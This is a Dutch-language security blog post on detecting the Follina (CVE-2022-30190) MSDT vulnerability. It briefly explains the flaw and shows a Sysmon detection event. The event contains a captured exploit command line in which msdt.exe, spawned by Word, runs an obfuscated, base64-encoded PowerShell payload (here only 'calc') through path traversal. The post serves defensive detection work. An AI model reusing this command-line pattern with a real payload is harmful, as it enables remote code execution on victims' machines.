Skip to main content
AanvalKwetsbaarheidOffice 2013 - 2019Office365Threat Intelligence

Detectie Follina (CVE-2022-30190) aanval KMO CDC

By 05/08/2022No Comments

Al in mei 2022 werd vastgesteld dat er misbruik werd gemaakt van een kwetsbaarheid voor het uitvoeren van externe code die van invloed is op Microsoft Windows Support Diagnostic Tool (MSDT). Het beveiligingslek wordt Follina genoemd en heeft de aanduiding CVE-2022-30190 met een CVSS-score van 7,3.

De Follina-kwetsbaarheid gebruikt de Microsoft Office Remote-sjabloonfunctie om een ​​HTML-bestand op te halen van een externe URL die op zijn beurt gebruik maakt van de MSDT om code uit te voeren. Om dit beveiligingslek te misbruiken, moet de aanvaller een Word-document maken om de initiële payload te bevatten en dit vervolgens afleveren bij het doeleindpunt.

Er is gemeld dat het beveiligingslek kan worden misbruikt in Microsoft Office-versies 2013 – 2019, Office 2021, Office 365 en Office ProPlus.

Wat is er nodig voor de detectie?

  • Sysmon moet geinstalleerd worden op de Agent
  • Detectie regel op de agent:
{
   "win":{
      "system":{
         "providerName":"Microsoft-Windows-Sysmon",
         "providerGuid":"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
         "eventID":"1",
         "version":"5",
         "level":"4",
         "task":"1",
         "opcode":"0",
         "keywords":"0x8000000000000000",
         "systemTime":"2022-06-27T12:40:16.8110927Z",
         "eventRecordID":"46563",
         "processID":"8328",
         "threadID":"8172",
         "channel":"Microsoft-Windows-Sysmon/Operational",
         "computer":"DESKTOP-4E0BQFT",
         "severityValue":"INFORMATION",
         "message":"\"Process Create:\r\nRuleName: technique_id=T1027,technique_name=Obfuscated Files or Information\r\nUtcTime: 2022-06-27 12:40:16.788\r\nProcessGuid: {76e50f37-a530-62b9-f813-000000000300}\r\nProcessId: 4924\r\nImage: C:\\Windows\\SysWOW64\\msdt.exe\r\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\r\nDescription: Diagnostics Troubleshooting Wizard\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: msdt.exe\r\nCommandLine: \"C:\\Windows\\system32\\msdt.exe\" ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'Y2FsYw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"\r\nCurrentDirectory: C:\\Users\\testuser\\Documents\\\r\nUser: DESKTOP-4E0BQFT\\testuser\r\nLogonGuid: {76e50f37-2fc1-6244-7717-020000000000}\r\nLogonId: 0x21777\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: SHA1=25FA6252069395C5F923A22D40FCB0EC6D13A109,MD5=A9AB42610361BF6432259061737EA309,SHA256=48103C8EE52D4CEFF0FB8974FFB17E6BFAB773B51F9D187A3A581401D6A7663B,IMPHASH=19CB93A7F4980963BA180BBC8785967E\r\nParentProcessGuid: {76e50f37-a529-62b9-f613-000000000300}\r\nParentProcessId: 5024\r\nParentImage: C:\\Program Files (x86)\\Microsoft Office\\Office15\\WINWORD.EXE\r\nParentCommandLine: \"C:\\Program Files (x86)\\Microsoft Office\\Office15\\WINWORD.EXE\" /n \"C:\\Users\\testuser\\Documents\\follina.doc\" /o \"\"\r\nParentUser: DESKTOP-4E0BQFT\\testuser\""
      },
      "eventdata":{
         "ruleName":"technique_id=T1027,technique_name=Obfuscated Files or Information",
         "utcTime":"2022-06-27 12:40:16.788",
         "processGuid":"{76e50f37-a530-62b9-f813-000000000300}",
         "processId":"4924",
         "image":"C:\\\\Windows\\\\SysWOW64\\\\msdt.exe",
         "fileVersion":"10.0.19041.1 (WinBuild.160101.0800)",
         "description":"Diagnostics Troubleshooting Wizard",
         "product":"Microsoft® Windows® Operating System",
         "company":"Microsoft Corporation",
         "originalFileName":"msdt.exe",
         "commandLine":"\\\"C:\\\\Windows\\\\system32\\\\msdt.exe\\\" ms-msdt:/id PCWDiagnostic /skip force /param \\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'Y2FsYw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\\"",
         "currentDirectory":"C:\\\\Users\\\\testuser\\\\Documents\\\\",
         "user":"DESKTOP-4E0BQFT\\\\testuser",
         "logonGuid":"{76e50f37-2fc1-6244-7717-020000000000}",
         "logonId":"0x21777",
         "terminalSessionId":"1",
         "integrityLevel":"Medium",
         "hashes":"SHA1=25FA6252069395C5F923A22D40FCB0EC6D13A109,MD5=A9AB42610361BF6432259061737EA309,SHA256=48103C8EE52D4CEFF0FB8974FFB17E6BFAB773B51F9D187A3A581401D6A7663B,IMPHASH=19CB93A7F4980963BA180BBC8785967E",
         "parentProcessGuid":"{76e50f37-a529-62b9-f613-000000000300}",
         "parentProcessId":"5024",
         "parentImage":"C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Office15\\\\WINWORD.EXE",
         "parentCommandLine":"\\\"C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Office15\\\\WINWORD.EXE\\\" /n \\\"C:\\\\Users\\\\testuser\\\\Documents\\\\follina.doc\\\" /o \\\"\\\"",
         "parentUser":"DESKTOP-4E0BQFT\\\\testuser"
      }
   }
}

follina
christophe

Author christophe

More posts by christophe

Leave a Reply

Close Menu
nl_BEDutch
nl_BEDutch